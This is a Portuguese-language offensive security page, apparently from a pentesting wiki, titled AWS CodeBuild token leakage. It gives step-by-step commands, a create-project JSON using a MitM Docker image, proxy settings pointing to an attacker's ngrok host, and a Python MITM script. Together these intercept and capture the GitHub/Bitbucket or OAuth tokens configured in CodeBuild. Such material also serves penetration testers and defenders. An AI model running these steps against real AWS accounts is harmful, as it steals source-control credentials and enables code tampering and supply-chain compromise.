AWS Codebuild - Token Leakage

Recuperar Tokens Configurados do Github/Bitbucket

Primeiro, verifique se há credenciais de origem configuradas que você poderia vazar:

aws codebuild list-source-credentials

Via Docker Image

Se você descobrir que a autenticação para, por exemplo, Github está configurada na conta, você pode exfiltrar esse acesso (token GH ou token OAuth) fazendo com que o Codebuild use uma imagem docker específica para executar a construção do projeto.

Para isso, você poderia criar um novo projeto Codebuild ou alterar o ambiente de um existente para definir a imagem Docker.

A imagem Docker que você poderia usar é https://github.com/carlospolop/docker-mitm. Esta é uma imagem Docker muito básica que irá definir as variáveis de ambiente https_proxy, http_proxy e SSL_CERT_FILE. Isso permitirá que você intercepte a maior parte do tráfego do host indicado em https_proxy e http_proxy e confie no SSL CERT indicado em SSL_CERT_FILE.

1. Crie e faça upload da sua própria imagem Docker MitM

• Siga as instruções do repositório para definir o endereço IP do seu proxy e configurar seu certificado SSL e construa a imagem docker.

• NÃO DEFINA http_proxy para não interceptar solicitações ao endpoint de metadados.

• Você poderia usar ngrok como ngrok tcp 4444 para definir o proxy para o seu host.

• Uma vez que você tenha a imagem Docker construída, faça o upload para um repositório público (Dockerhub, ECR...)

2. Defina o ambiente

• Crie um novo projeto Codebuild ou modifique o ambiente de um existente.

• Defina o projeto para usar a imagem Docker gerada anteriormente.

3. Defina o proxy MitM no seu host

• Como indicado no repositório Github, você poderia usar algo como:

mitmproxy --listen-port 4444  --allow-hosts "github.com"

4. Execute a construção e capture as credenciais

• Você pode ver o token no cabeçalho Authorization:

Isso também pode ser feito a partir do aws cli com algo como

# Create project using a Github connection
aws codebuild create-project --cli-input-json file:///tmp/buildspec.json

## With /tmp/buildspec.json
{
"name": "my-demo-project",
"source": {
"type": "GITHUB",
"location": "https://github.com/uname/repo",
"buildspec": "buildspec.yml"
},
"artifacts": {
"type": "NO_ARTIFACTS"
},
"environment": {
"type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM
"image": "docker.io/carlospolop/docker-mitm:v12",
"computeType": "BUILD_GENERAL1_SMALL",
"imagePullCredentialsType": "CODEBUILD"
}
}

## Json

# Start the build
aws codebuild start-build --project-name my-project2

Via protocolo HTTP

Um atacante com permissões elevadas em um CodeBuild poderia vazar o token do Github/Bitbucket configurado ou, se as permissões foram configuradas via OAuth, o token OAuth temporário usado para acessar o código.

• Um atacante poderia adicionar as variáveis de ambiente http_proxy e https_proxy ao projeto CodeBuild apontando para sua máquina (por exemplo http://5.tcp.eu.ngrok.io:14972).

• Em seguida, mudar a URL do repositório do github para usar HTTP em vez de HTTPS, por exemplo: **http://**github.com/carlospolop-forks/TestActions

• Em seguida, executar o exemplo básico de https://github.com/synchronizing/mitm na porta apontada pelas variáveis de proxy (http_proxy e https_proxy)

from mitm import MITM, protocol, middleware, crypto

mitm = MITM(
host="127.0.0.1",
port=4444,
protocols=[protocol.HTTP],
middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
certificate_authority = crypto.CertificateAuthority()
)
mitm.run()

• Finalmente, clique em Build the project, as credenciais serão enviadas em texto claro (base64) para a porta mitm: